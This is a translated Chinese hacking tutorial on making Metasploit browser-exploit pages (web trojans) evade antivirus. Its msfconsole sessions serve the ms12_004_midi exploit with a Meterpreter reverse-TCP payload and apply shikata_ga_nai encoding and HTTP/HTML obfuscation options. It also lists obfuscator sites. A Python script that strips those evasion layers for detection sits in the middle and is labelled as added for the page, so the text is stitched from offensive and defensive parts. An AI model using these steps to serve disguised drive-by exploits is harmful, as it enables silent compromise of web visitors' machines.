


AV evasion for Metasploit web trojans (网马)

Updated: 2013-9-14 0:23:52   Author: compiled by 华中帝国   Source: 华中帝国
  About web trojans
  In recent years, planting trojans on domestic websites (挂马) has grown explosively, and decoding web trojans has gradually drawn people's attention.
  A web trojan (网马) is a trojan embedded in a web page: as soon as you open the page the trojan runs, and you are infected without noticing.
  A web trojan is really just an HTML page. What sets it apart from other pages is that it has been carefully crafted by an attacker, so a user who visits it gets the trojan.
  Why "carefully crafted"? Because the script embedded in the page exploits a vulnerability in the IE browser precisely enough to make IE silently download the trojan the attacker has placed online and run (install) it. In other words, the page downloads the trojan to the local machine and runs (installs) it, with the whole process happening in the background: once the user opens the page, the download and the run (install) start automatically.
  About metasploit
  metasploit bundles hundreds of web trojans, and you can use whatever shellcode you like, which makes penetration much simpler. But during this process, what if the other side has a firewall installed?
  Like the figure below:
  Web trojan AV evasion
  Take the latest midiOutPlayNextPolyEvent Heap Overflow as an example. First generate an ordinary one:
  msf > use exploit/windows/browser/ms12_004_midi
  msf exploit(ms12_004_midi) > show options

  Module options (exploit/windows/browser/ms12_004_midi):

     Name        Current Setting  Required  Description
     ----        ---------------  --------  -----------
     OBFUSCATE   false            no        Enable JavaScript obfuscation
     SRVHOST     0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
     SRVPORT     8080             yes       The local port to listen on.
     SSL         false            no        Negotiate SSL for incoming connections
     SSLCert                      no        Path to a custom SSL certificate (default is randomly generated)
     SSLVersion  SSL3             no        Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
     URIPATH                      no        The URI to use for this exploit (default is random)

  Payload options (windows/meterpreter/reverse_tcp):

     Name      Current Setting  Required  Description
     ----      ---------------  --------  -----------
     EXITFUNC  process          yes       Exit technique: seh, thread, process, none
     LHOST     5.5.5.1          yes       The listen address
     LPORT     4444             yes       The listen port

  Exploit target:

     Id  Name
     --  ----
     0   Automatic

  msf exploit(ms12_004_midi) > exploit
  [*] Exploit running as background job.
  [*] Started reverse handler on 5.5.5.1:4444
  [*] Using URL: http://0.0.0.0:8080/qhvy86C7TNlbqQN
  [*] Local IP: http://112.114.168.177:8080/qhvy86C7TNlbqQN
  [*] Server started.
  msf exploit(ms12_004_midi) >
  Inspect the web trojan's code; let's look at the legendary web trojan:
  brk@Dis9Team:~$ wget -U "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB5)" http://112.114.168.177:8080/qhvy86C7TNlbqQN -O 1 | more 1
  --2012-03-12 01:18:15-- http://112.114.168.177:8080/qhvy86C7TNlbqQN
  正在连接 112.114.168.177:8080... 已连接。
  已发出 HTTP 请求,正在等待回应... 200 OK
  长度: 35426 (35K) [text/html]
  正在保存至: “1”
  100%[======================================>] 35,426 --.-K/s 花时 0s
  2012-03-12 01:18:15 (213 MB/s) - 已保存 “1” [35426/35426])
  ::::::::::::::
  1
  ::::::::::::::
  <html>
  <head>
  <script language='javascript'>
  //
  // JavaScript Heap Exploitation library
  // by Alexander Sotirov <asotirov@determina.com>
  //
  // Version 0.3
  //
  // Copyright (c) 2007, Alexander Sotirov
  // All rights reserved.
  //
  // The HeapLib library is licensed under a BSD license, the text of which follows:
  //
  // Redistribution and use in source and binary forms, with or without
  // modification, are permitted provided that the following conditions
  // are met:
  //
  // 1. Redistributions of source code must retain the above copyright
  // notice, this list of conditions and the following disclaimer.
  // 2. Redistributions in binary form must reproduce the above copyright
  // notice, this list of conditions and the following disclaimer in the
  // documentation and/or other materials provided with the distribution.
  // 3. Neither the name of Alexander Sotirov nor the name of Determina Inc.
  // may be used to endorse or promote products derived from this software
  // without specific prior written permission.
  Ugh, damn it, plaintext. It would be a miracle if this weren't flagged.
  Evasion with ENCODER
  Metasploit can generate shellcode as EXE, PHP, VBS, DLL and so on, and it also offers evasion features. What about web trojans? It can do that too.
  First stop the web trojan job:
  msf exploit(ms12_004_midi) > jobs

  Jobs
  ====

    Id  Name
    --  ----
    0   Exploit: windows/browser/ms12_004_midi

  msf exploit(ms12_004_midi) > kill 0
  Stopping job: 0...

  [*] Server stopped.
  msf exploit(ms12_004_midi) >
  Encode the page with ENCODER. The available options are:
  set ENCODER cmd/generic_sh
  set ENCODER cmd/ifs
  set ENCODER cmd/printf_php_mq
  set ENCODER generic/none
  set ENCODER mipsbe/longxor
  set ENCODER mipsle/longxor
  set ENCODER php/base64
  set ENCODER ppc/longxor
  set ENCODER ppc/longxor_tag
  set ENCODER sparc/longxor_tag
  set ENCODER x64/xor
  set ENCODER x86/alpha_mixed
  set ENCODER x86/alpha_upper
  set ENCODER x86/avoid_utf8_tolower
  set ENCODER x86/call4_dword_xor
  set ENCODER x86/context_cpuid
  set ENCODER x86/context_stat
  set ENCODER x86/context_time
  set ENCODER x86/countdown
  set ENCODER x86/fnstenv_mov
  set ENCODER x86/jmp_call_additive
  set ENCODER x86/nonalpha
  set ENCODER x86/nonupper
  set ENCODER x86/shikata_ga_nai
  set ENCODER x86/single_static_bit
  set ENCODER x86/unicode_mixed
  set ENCODER x86/unicode_upper
  I'll use x86/shikata_ga_nai:
  msf exploit(ms12_004_midi) > set ENCODER x86/shikata_ga_nai
  ENCODER => x86/shikata_ga_nai
  msf exploit(ms12_004_midi) > exploit -j
  [*] Exploit running as background job.
  [*] Started reverse handler on 5.5.5.1:4444
  [*] Using URL: http://0.0.0.0:8080/gNaH1Zi9e5
  [*] Local IP: http://112.114.168.177:8080/gNaH1Zi9e5
  [*] Server started.
  msf exploit(ms12_004_midi) >
  nops
  A sequence of 0x90 bytes; Metasploit can generate unpredictable ones:
  msf exploit(ms11_050_mshtml_cobjectelement) > show nops

  NOP Generators
  ==============

     Name             Disclosure Date  Rank    Description
     ----             ---------------  ----    -----------
     armle/simple                      normal  Simple
     php/generic                       normal  PHP Nop Generator
     ppc/simple                        normal  Simple
     sparc/random                      normal  SPARC NOP generator
     tty/generic                       normal  TTY Nop Generator
     x64/simple                        normal  Simple
     x86/opty2                         normal  Opty2
     x86/single_byte                   normal  Single Byte
  evasion
  OK, take a look:
  msf exploit(ms11_050_mshtml_cobjectelement) > show evasion

  Module evasion options:

     Name            : HTML::base64
     Current Setting : double_pad
     Description     : Enable HTML obfuscation via an embeded base64 html object (IE not supported) (accepted: none, plain, single_pad, double_pad, random_space_injection)

     Name            : HTML::javascript::escape
     Current Setting : 0
     Description     : Enable HTML obfuscation via HTML escaping (number of iterations)

     Name            : HTML::unicode
     Current Setting : utf-32le
     Description     : Enable HTTP obfuscation via unicode (accepted: none, utf-16le, utf-16be, utf-16be-marker, utf-32le, utf-32be)

     Name            : HTTP::chunked
     Current Setting : false
     Description     : Enable chunking of HTTP responses via "Transfer-Encoding: chunked"

     Name            : HTTP::compression
     Current Setting : none
     Description     : Enable compression of HTTP responses via content encoding (accepted: none, gzip, deflate)

     Name            : HTTP::header_folding
     Current Setting : false
     Description     : Enable folding of HTTP headers

     Name            : HTTP::junk_headers
     Current Setting : false
     Description     : Enable insertion of random junk HTTP headers

     Name            : HTTP::server_name
     Current Setting : Apache
     Description     : Configures the Server header of all outgoing replies

     Name            : TCP::max_send_size
     Current Setting : 0
     Description     : Maximum tcp segment size. (0 = disable)

     Name            : TCP::send_delay
     Current Setting : 0
     Description     : Delays inserted before every send. (0 = disable)

  msf exploit(ms11_050_mshtml_cobjectelement) >
  This one is simple: just pick the options you want.
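  Seen from the defender's side, the HTTP- and HTML-layer evasion options listed above are all reversible transforms of the response, so an inspection proxy or sandbox can peel them off before matching on the page. The Python script below is an added example written for this page; it is not Metasploit code and not from the original article. It undoes chunked transfer encoding and gzip/deflate compression (HTTP::chunked, HTTP::compression), re-decodes UTF-16/UTF-32 HTML with or without a byte-order mark (HTML::unicode, including the utf-16be-marker variant), unwraps base64 data: objects (HTML::base64; the exact <object> wrapper markup is an assumption here), and then looks for the plaintext HeapLib header strings quoted earlier. SIGNATURES, SAMPLE_PAGE and build_sample() are constructed for the demonstration.

```python
import base64
import binascii
import codecs
import gzip
import re
import zlib

# Plaintext markers taken from the HeapLib header quoted earlier on this page.
# Constructed signature list for illustration; a real deployment carries its own IOCs.
SIGNATURES = [
    b"JavaScript Heap Exploitation library",
    b"HeapLib",
    b"heapLib",
]


def dechunk(body: bytes) -> bytes:
    """Reassemble a 'Transfer-Encoding: chunked' body (undoes HTTP::chunked)."""
    out = bytearray()
    pos = 0
    while True:
        end = body.index(b"\r\n", pos)
        size = int(body[pos:end].split(b";")[0], 16)  # ignore chunk extensions
        if size == 0:
            break
        pos = end + 2
        out += body[pos:pos + size]
        pos += size + 2  # skip the CRLF that terminates the chunk data
    return bytes(out)


def decompress(body: bytes, encoding: str) -> bytes:
    """Undo Content-Encoding gzip/deflate (undoes HTTP::compression)."""
    if encoding == "gzip":
        return gzip.decompress(body)
    if encoding == "deflate":
        try:
            return zlib.decompress(body)       # zlib-wrapped deflate
        except zlib.error:
            return zlib.decompress(body, -15)  # raw deflate, as some servers send it
    return body


def decode_unicode(body: bytes) -> bytes:
    """Normalise UTF-16/UTF-32 HTML back to UTF-8 (undoes HTML::unicode).

    Checks for a BOM first (the *-marker variant), then infers width and byte
    order from the NUL pattern around the first character, which is '<' in HTML.
    """
    boms = ((codecs.BOM_UTF32_LE, "utf-32-le"), (codecs.BOM_UTF32_BE, "utf-32-be"),
            (codecs.BOM_UTF16_LE, "utf-16-le"), (codecs.BOM_UTF16_BE, "utf-16-be"))
    for bom, enc in boms:
        if body.startswith(bom):
            return body[len(bom):].decode(enc, "replace").encode("utf-8")
    head = body[:4]
    enc = None
    if len(head) == 4 and head[1:4] == b"\x00\x00\x00":
        enc = "utf-32-le"
    elif len(head) == 4 and head[0:3] == b"\x00\x00\x00":
        enc = "utf-32-be"
    elif len(head) >= 2 and head[1:2] == b"\x00":
        enc = "utf-16-le"
    elif len(head) >= 2 and head[0:1] == b"\x00":
        enc = "utf-16-be"
    return body if enc is None else body.decode(enc, "replace").encode("utf-8")


def unwrap_base64_objects(html: bytes) -> bytes:
    """Append the decoded content of data:text/html;base64 objects (HTML::base64).

    Assumption: the wrapper is <object data="data:text/html;base64,..."> and may
    carry injected whitespace (random_space_injection) or extra '=' padding.
    """
    extra = b""
    for blob in re.findall(rb"data:text/html;base64,([A-Za-z0-9+/=\s]+)", html):
        blob = re.sub(rb"\s+", b"", blob).rstrip(b"=")
        blob += b"=" * (-len(blob) % 4)  # re-pad after stripping odd padding
        try:
            extra += b"\n" + decode_unicode(base64.b64decode(blob))
        except binascii.Error:
            continue
    return html + extra


def normalise_response(headers: dict, body: bytes) -> bytes:
    """Peel the transport- and HTML-layer evasions off a captured HTTP response."""
    h = {k.lower(): v.lower() for k, v in headers.items()}
    if "chunked" in h.get("transfer-encoding", ""):
        body = dechunk(body)
    body = decompress(body, h.get("content-encoding", ""))
    body = decode_unicode(body)
    return unwrap_base64_objects(body)


def scan(headers: dict, body: bytes) -> list:
    """Return the signatures found after normalisation, sorted."""
    text = normalise_response(headers, body)
    return sorted(s.decode() for s in SIGNATURES if s in text)


# Constructed sample: a page carrying the HeapLib header, encoded as UTF-32LE,
# wrapped in a base64 <object> with injected spaces, gzip-compressed and chunked.
SAMPLE_PAGE = (b"<html><head><script>\n"
               b"// JavaScript Heap Exploitation library\n"
               b"// The HeapLib library is licensed under a BSD license\n"
               b"function heapLib(){}\n"
               b"</script></head></html>")


def build_sample() -> tuple:
    inner = SAMPLE_PAGE.decode("ascii").encode("utf-32-le")
    b64 = base64.b64encode(inner)
    spaced = b" ".join(b64[i:i + 8] for i in range(0, len(b64), 8)) + b"=="
    wrapper = (b'<html><body><object data="data:text/html;base64,' + spaced
               + b'"></object></body></html>')
    gz = gzip.compress(wrapper)
    chunks = [gz[i:i + 100] for i in range(0, len(gz), 100)]
    chunked = b"".join(b"%x\r\n%s\r\n" % (len(c), c) for c in chunks) + b"0\r\n\r\n"
    headers = {"Server": "Apache", "Transfer-Encoding": "chunked", "Content-Encoding": "gzip"}
    return headers, chunked


if __name__ == "__main__":
    hdrs, raw = build_sample()
    print("marker visible in raw body:", b"HeapLib" in raw)
    print("after normalisation:", scan(hdrs, raw))
```

  Note what this does not cover: HTML::javascript::escape, OBFUSCATE and the ENCODER choice rewrite the script body rather than the transport, so after this normalisation a JavaScript-aware engine still has to deobfuscate or execute the page; the HTTP::junk_headers, header_folding and TCP::* options only matter to a detector that parses the raw stream, which is why the example works from parsed headers.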
  Social-Engineer Toolkit
  Social-Engineering Toolkit (SET) is a social-engineering tool designed by David Kennedy (ReL1K). SET integrates several useful social-engineering attack tools behind a single, simple interface; it mainly relies on Metasploit's web trojans + web page cloning + DNS spoofing. It needs a lot of things installed, so set it up yourself if you have the time.
  Do it by hand
  After generating the web trojan, download it with wget using a spoofed User-Agent, then apply evasion with:
  http://www.daftlogic.com/projects-online-javascript-obfuscator.htm
  http://javascriptcompressor.com
  http://dean.edwards.name/weblog/2007/04/packer3
  Modify the source code
  http://funoverip.net/2011/04/100pc-anti-virus-evasion-with-metasploit-browser-exploits-from-ms11-003/
Responsible editor: 华中帝国


